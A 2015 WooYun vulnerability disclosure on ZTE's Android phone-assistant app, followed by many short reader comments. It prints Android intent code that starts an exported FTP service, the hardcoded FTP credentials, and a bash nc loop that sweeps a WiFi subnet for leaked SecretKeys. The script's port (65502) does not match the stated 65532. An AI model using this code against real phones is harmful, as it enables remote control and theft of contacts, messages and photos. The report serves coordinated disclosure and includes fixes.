当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-094537

漏洞标题:中兴手机助手本地提权与WIFI远程管理的认证机制绕过(详细Android分析过程与思路)

相关厂商:中兴通讯股份有限公司

漏洞作者: 小荷才露尖尖角

提交时间:2015-01-29 11:34

修复时间:2015-04-29 11:36

公开时间:2015-04-29 11:36

漏洞类型:非授权访问/认证绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-29: 细节已通知厂商并且等待厂商处理中
2015-01-30: 厂商已经确认,细节仅向厂商公开
2015-02-02: 细节向第三方安全合作伙伴开放
2015-03-26: 细节向核心白帽子及相关领域专家公开
2015-04-05: 细节向普通白帽子公开
2015-04-15: 细节向实习白帽子公开
2015-04-29: 细节向公众公开

简要描述:

包括两个漏洞:
(1)组件暴露,导致本地提权和远程访问
(2)远程管理认证机制绕过

详细说明:

中兴手机助手是中兴官方的安卓智能手机管理软件,官方下载地址为http://joinme.ztems.com/,我们测试的安卓版本为最新版2.1.66.3224,百度搜索显示下载量已有86万,不知中兴手机是否内置该应用。
包括两个漏洞:
第一个漏洞:本地组件暴露导致提权,只要用户安装中兴手机助手,无需任何权限的本地恶意应用就可在用户不知情的情况下启动供远程访问的FTP服务,且该FTP服务具有默认的用户名和密码。
暴露的两个安卓组件分别为 com.joinme.ftp.FtpServerService和JoinMeServiceReceiver。通过如下代码,

m_testbutton1=(Button)findViewById(R.id.BySvc);
        m_testbutton1.setOnClickListener(new OnClickListener()
        {
@Override
public void onClick(View v) {
// TODO Auto-generated method stub
Intent i = new Intent();
i.setAction("com.joinme.ftp.FtpServerService");
startService(i);
}
        });


或者

m_testbutton2=(Button)findViewById(R.id.ByReceiver);
        m_testbutton2.setOnClickListener(new OnClickListener()
        {
@Override
public void onClick(View v) {
// TODO Auto-generated method stub
Intent i = new Intent();
i.setAction("android.intent.action.JoinMe_Ftp_Server_Service_Start");
sendBroadcast(i);
}
        });


之一即可启动手机助手内置的FTP服务。
正常情况下启用服务需要用户干预,如图

normal_start.png


在用户不知情的情况下开启服务(只需要手机安装中兴手机助手)

user-unware.png


FTP服务还具有内置的默认用户名和密码,并在端口2121监听。如下图,见位于
FtpServerService中的代码片段。
加载FTP服务设置

load-ftpsetting.png


跟入Defaults类,得到默认username、password为JoinMe,port为2121

defaul-pwd.png


第二个漏洞:在手机助手后台运行的情况下,泄露SecretKey,导致可在WIFI环境远程控制手机
在分析第一个漏洞的时候,发现了第二个漏洞,与这个漏洞相比,上一个漏洞简直不算啥。
漏洞位于 JoinMeUdpService,该服务打开udp的65532端口监听,接收特定的命令字后可返回手机的敏感信息,包括SecretKey
如图,JoinMeUdpService的doListen方法

doListen.png


跟入doComm,可发现特定的命令为“JoinMe Broadcast"

cmd.png


漏洞证明:

第一个漏洞的证明:
利用默认用户名和密码远程访问FTP服务,非root条件下可浏览、下载/sdcard等目录中的文件。

ftpaccess.png


该FTP服务支持的命令

ftp_support.png


第二个漏洞的证明:

query-secretkey.png


注意上面的SecretKey,就是中兴手机助手PC端管理手机的验证码。当手机助手在后台运行的情况下,可在PC端通过验证码完全管理手机,获得所有通信录、短信、照片及应用信息,并具有手机助手所有的添加、删改权限!!

remote-connect.png


remote-access.png


比较有杀伤力的场景是在公共WIFI场所,在用户手机助手运行的情况下,通过以下脚本可以扫描获得SecretKey,并利用PC端进行远控!
scan.sh

#!/bin/bash
network="192.168.1"
for address in $(seq 1 254)
do
    echo  ${network}.${address}
    echo -n "JoinMe Broadcast" | nc  -w 2 -u  ${network}.${address}  65502
done


扫描结果

scanresult.png


PC端远控相应手机

batch-control.png


修复方案:

针对漏洞一: 设置com.joinme.ftp.FtpServerService、 JoinMeServiceReceiver为exported:false,或者设置自定义权限,并将保护级别设为signature。FTP服务的用户名和密码,不要硬编码在代码中,可以设置在配置文件中读取。或者由用户在PC端手机助手临时指定。
针对漏洞二:禁用远程回显SecretKey

版权声明:转载请注明来源 小荷才露尖尖角@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-01-30 09:06

厂商回复:

厉害,话说洞主不是学生吧,要是学生能静下心来研究如此深入,那是真心膜拜~

最新状态:

暂无

漏洞评价:

评论

  1. 2015-01-29 11:34 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    好漂亮的分析啊

  2. 2015-01-29 11:37 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    厉害

  3. 2015-01-29 11:40 | 白非白 ( 普通白帽子 | Rank:447 漏洞数:60 | ♫ Freedom - Anthony Hamilton ♫)

    关注

  4. 2015-01-29 11:40 | felixk3y ( 普通白帽子 | Rank:523 漏洞数:41 | php python jsp)

    @xsser @疯狗 明知看不了,简直赤裸裸的诱惑...

  5. 2015-01-29 11:41 | Ano_Tom ( 普通白帽子 | Rank:368 漏洞数:40 | Talk is cheap.:)

    这个叼,楼上2位我的漏洞是不给我审了么@疯狗@xsser

  6. 2015-01-29 11:41 | 天地不仁 以万物为刍狗 ( 普通白帽子 | Rank:977 漏洞数:264 | 天地本不仁 万物为刍狗)

    前排 坐等公开

  7. 2015-01-29 11:41 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @小荷才露尖尖角 在公共Wi-Fi里简直就是屠杀啊,给你生猴子行不行?

  8. 2015-01-29 11:45 | 小荷才露尖尖角 ( 实习白帽子 | Rank:91 漏洞数:13 | less is more)

    还是有利用条件,需要用户运行该应用。

  9. 2015-01-29 11:46 | p4ssw0rd ( 普通白帽子 | Rank:306 漏洞数:92 | 不作死就不会死)

    关注

  10. 2015-01-29 11:46 | bey0nd ( 普通白帽子 | Rank:895 漏洞数:142 | 相忘于江湖,不如相濡以沫)

    关注

  11. 2015-01-29 11:50 | hkAssassin ( 普通白帽子 | Rank:358 漏洞数:66 | 我是一只毛毛虫。)

    我鄙视能看到漏洞的人,看了之后诱惑我们的

  12. 2015-01-29 12:10 | 鸟云厂商 认证白帽子 ( 核心白帽子 | Rank:1313 漏洞数:146 | 中国菜鸟)

    原来是这样,神思路啊!

  13. 2015-01-29 12:12 | zph ( 普通白帽子 | Rank:235 漏洞数:43 )

    @鸟云厂商 我一直以为你的ID是乌云厂商……

  14. 2015-01-29 12:22 | 鸟云厂商 认证白帽子 ( 核心白帽子 | Rank:1313 漏洞数:146 | 中国菜鸟)

    @zph 我在zone是乌云厂商,在主站是鸟云厂商

  15. 2015-01-29 12:35 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @鸟云厂商 你知道什么了

  16. 2015-01-29 12:37 | zph ( 普通白帽子 | Rank:235 漏洞数:43 )

    @鸟云厂商 怎么做到的。。

  17. 2015-01-29 12:42 | 鸟云厂商 认证白帽子 ( 核心白帽子 | Rank:1313 漏洞数:146 | 中国菜鸟)

    @疯狗 我就是来装个逼,啥也不知道。

  18. 2015-01-29 14:17 | he1renyagao ( 普通白帽子 | Rank:225 漏洞数:29 | 是金子总会发光,在还未发光之前,先打磨打...)

    牛逼的思路

  19. 2015-01-29 14:27 | 浮萍 ( 普通白帽子 | Rank:555 漏洞数:118 | 默默潜水)

    略吊6

  20. 2015-01-29 14:30 | nzk1912 ( 实习白帽子 | Rank:41 漏洞数:10 | 软件开发8年了,也来挖挖漏洞,为创建安全...)

    我靠,牛XX就是牛XX,这分析能力~

  21. 2015-01-29 15:05 | 刘海哥 ( 普通白帽子 | Rank:114 漏洞数:28 | 索要联系方式但不送礼物的厂商定义为无良厂...)

    吓尿了!

  22. 2015-01-29 15:10 | 计算姬 ( 普通白帽子 | Rank:398 漏洞数:90 | 看我看我看我啊)

    我次奥,盗了狗哥的号上去看了下,果然牛逼。

  23. 2015-01-29 15:45 | onpu ( 实习白帽子 | Rank:64 漏洞数:19 | 静坐常思己过,闲谈莫论人非)

    默默的点赞。

  24. 2015-01-29 15:47 | 爱上平顶山 认证白帽子 ( 核心白帽子 | Rank:2738 漏洞数:547 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)

    应该扔到drops

  25. 2015-01-29 16:24 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)

    NB!

  26. 2015-01-29 17:18 | Qiudays ( 路人 | Rank:10 漏洞数:9 | 感觉自己萌萌哒)

    坐等公开

  27. 2015-01-29 17:21 | LongY ( 实习白帽子 | Rank:83 漏洞数:11 | 强行送一血)

    mark

  28. 2015-01-29 17:27 | tracyfan ( 路人 | Rank:15 漏洞数:2 | 崇尚进攻只能编出烂代码的抢点型前锋)

    坐等该洞上头条,奖楼主手机一台

  29. 2015-01-29 20:30 | f4ckbaidu ( 普通白帽子 | Rank:182 漏洞数:23 | 开发真是日了狗了)

    屌,mark

  30. 2015-01-29 21:37 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    真牛逼

  31. 2015-01-29 21:41 | M4sk ( 普通白帽子 | Rank:1199 漏洞数:319 | 国内信息安全任重而道远,还需要厂商和白帽...)

    思路真赞! 好漂亮的分析啊

  32. 2015-02-02 09:30 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    @M4sk 明知看不到详情还在这里诱惑大家

  33. 2015-02-02 09:48 | 浅蓝 ( 普通白帽子 | Rank:274 漏洞数:109 | 爱安全:www.ixsec.orgXsec社区:zone.ixse...)

    不错的思路,为洞主漂亮的分析点下赞。

  34. 2015-02-02 11:43 | goubuli ( 普通白帽子 | Rank:324 漏洞数:61 )

    你们都能看到详细了?我只能Mark一下

  35. 2015-02-02 14:10 | 乌云白帽子 ( 路人 | Rank:11 漏洞数:4 | 路人甲)

    操,赤裸裸的诱惑

  36. 2015-02-02 15:41 | Sneezry ( 路人 | Rank:0 漏洞数:1 | I write code.)

    我去,洞主太厉害了,这思路绝了(其实我啥都看不到……

  37. 2015-02-02 15:46 | 中酒时代酒业(北京)有限公司(乌云厂商)

    厂商来赞,服气!

  38. 2015-02-03 00:07 | xiaoL ( 普通白帽子 | Rank:361 漏洞数:67 | PKAV技术宅社区!Blog:http://www.xlixli....)

    @中酒时代酒业(北京)有限公司 厂商来赞不容易啊

  39. 2015-02-03 09:49 | qhwlpg ( 普通白帽子 | Rank:226 漏洞数:54 | 潜心代码审计。)

    坐等公开啊--

  40. 2015-02-03 09:54 | noob ( 实习白帽子 | Rank:81 漏洞数:18 | 向各位大神学习,向各位大神致敬)

    尼玛,看不到,评论还那么诱惑,坑爹呢

  41. 2015-02-03 11:09 | 那个夏天骚年未老 ( 路人 | Rank:0 漏洞数:2 | 呵呵,呵,呵呵呵)

    好叼的分析,这年头能沉下心研究分析的课不多。赞一个~~

  42. 2015-02-03 11:29 | woody ( 路人 | Rank:8 漏洞数:1 | 菜鸟一枚)

    坐等公开啊--

  43. 2015-02-03 11:39 | Neeke ( 普通白帽子 | Rank:101 漏洞数:24 | 求传授刷Rank方法?)

    赶紧公开

  44. 2015-02-03 12:37 | Fireweed ( 普通白帽子 | Rank:107 漏洞数:14 | Show me the #)

    膜拜下

  45. 2015-02-03 12:45 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    @浅蓝 @M4sk @nzk1912 @计算姬 @刘海哥 @he1renyagao @鸟云厂商 你们能不装逼么?明明看不到还装着看的到

  46. 2015-02-03 12:50 | 鸟云厂商 认证白帽子 ( 核心白帽子 | Rank:1313 漏洞数:146 | 中国菜鸟)

    @U神 师傅对不起我错了

  47. 2015-02-03 13:44 | laoyao ( 路人 | Rank:14 漏洞数:5 | ด้้้้้็็็็็้้้้้็็็็...)

    ------mark

  48. 2015-02-03 14:34 | Arthur ( 实习白帽子 | Rank:77 漏洞数:33 | USA,I am coming!!!!!)

    @U神 你何时在乌云变得如此霸气。。囧,求代刷rank

  49. 2015-02-03 15:01 | 刘海哥 ( 普通白帽子 | Rank:114 漏洞数:28 | 索要联系方式但不送礼物的厂商定义为无良厂...)

    @U神 师傅对不起我错了

  50. 2015-02-03 15:34 | he1renyagao ( 普通白帽子 | Rank:225 漏洞数:29 | 是金子总会发光,在还未发光之前,先打磨打...)

    @U神 师傅对不起我错了

  51. 2015-02-03 16:49 | zhuixing ( 实习白帽子 | Rank:50 漏洞数:9 | 纯纯的小白。)

    等公开呀等公开……

  52. 2015-02-04 16:26 | 茜茜公主 ( 普通白帽子 | Rank:2360 漏洞数:406 | 家里二宝出生,这几个月忙着把屎把尿...忒...)

    mark

  53. 2015-02-05 13:04 | abaddon ( 实习白帽子 | Rank:37 漏洞数:10 | 我叫什么名字)

    两位顶级白帽子的赞叹和 乌云闪电还有一堆美刀符号暗示这个漏洞公开后值得反复研究与借鉴,做个标记几个月后回来看

  54. 2015-02-05 13:45 | x-star ( 普通白帽子 | Rank:124 漏洞数:13 | Windows/Linux Kernel. Information Secur...)

    MARK !!!!

  55. 2015-02-05 17:23 | 小黄蜂 ( 路人 | Rank:18 漏洞数:3 | 好男儿名垂千古&好姑娘永垂不朽)

    马克

  56. 2015-02-05 20:00 | 狼狗 ( 路人 | 还没有发布任何漏洞 | 我来到这里是为了国家各个互联网安全。学习...)

    多多跟着楼主学习。、

  57. 2015-02-06 11:22 | 黑吃黑 ( 普通白帽子 | Rank:139 漏洞数:29 | 倚楼听风雨,淡看江湖路...)

    好漂亮的分析啊

  58. 2015-02-07 18:00 | 乌山云雨 ( 路人 | Rank:20 漏洞数:1 | 一只正在乌山云雨中翻滚的小菜鸟)

    看着你们吹牛逼,我又吹不过你们!这日子没法过了。

  59. 2015-02-17 18:11 | 半夏 ( 路人 | Rank:12 漏洞数:3 | 新人一枚。。)

    坐等公开啊

  60. 2015-02-19 10:44 | 吃虾小能手 ( 普通白帽子 | Rank:213 漏洞数:21 | 老板,还有虾吗?)

    509team, 好吊的名字, 是wushi吗

  61. 2015-02-28 13:43 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    很给力。@吃虾小能手 509是宿舍房号?

  62. 2015-03-04 14:19 | Mujj ( 实习白帽子 | Rank:58 漏洞数:4 | IDC商)

    好漂亮的分析啊

  63. 2015-03-04 21:19 | Nicky ( 普通白帽子 | Rank:477 漏洞数:69 | http://www.droidsec.cn 安卓安全中文站)

    不错的分析,已转www.droidsec.cn

  64. 2015-04-15 17:34 | zzzzy ( 路人 | Rank:10 漏洞数:3 | 熟练各种语言名称的拼写)

    - -我这个路人就不装逼了。。。猴年马月才能看到啊

  65. 2015-04-29 11:52 | only_admin ( 路人 | Rank:11 漏洞数:5 | ~~~~我只是个孩子╭(°A°`)╮~~~~)

    坐看大神

  66. 2015-04-29 12:19 | 冰海 ( 实习白帽子 | Rank:70 漏洞数:7 | I can do better , why not ?)

    分析过程和作文方式都值得学习,很赞!

  67. 2015-04-29 14:05 | 小胖纸 ( 实习白帽子 | Rank:37 漏洞数:12 | 找人拿指定金融期货原油网站,只要客户资料...)

    LZ请收下我的膝盖。

  68. 2015-04-29 14:37 | 圣路西法 ( 路人 | Rank:4 漏洞数:3 | 围观大神ส็็็็็็ ̷̸̨̀͒̏̃ͦ...)

    卧槽,这个真心大神。

  69. 2015-04-30 11:50 | 黑色的屌丝 ( 路人 | Rank:27 漏洞数:5 | →_→→_→)

    大神。你应该上榜了

  70. 2015-05-19 22:20 | 暗羽 ( 路人 | Rank:21 漏洞数:6 | 喵呜,给人类的智商跪了)

    mark

  71. 2015-05-26 14:53 | 胡小树 ( 实习白帽子 | Rank:60 漏洞数:11 | 我是一颗小小树)

    @小荷才露尖尖角 大牛能推荐些相关资料不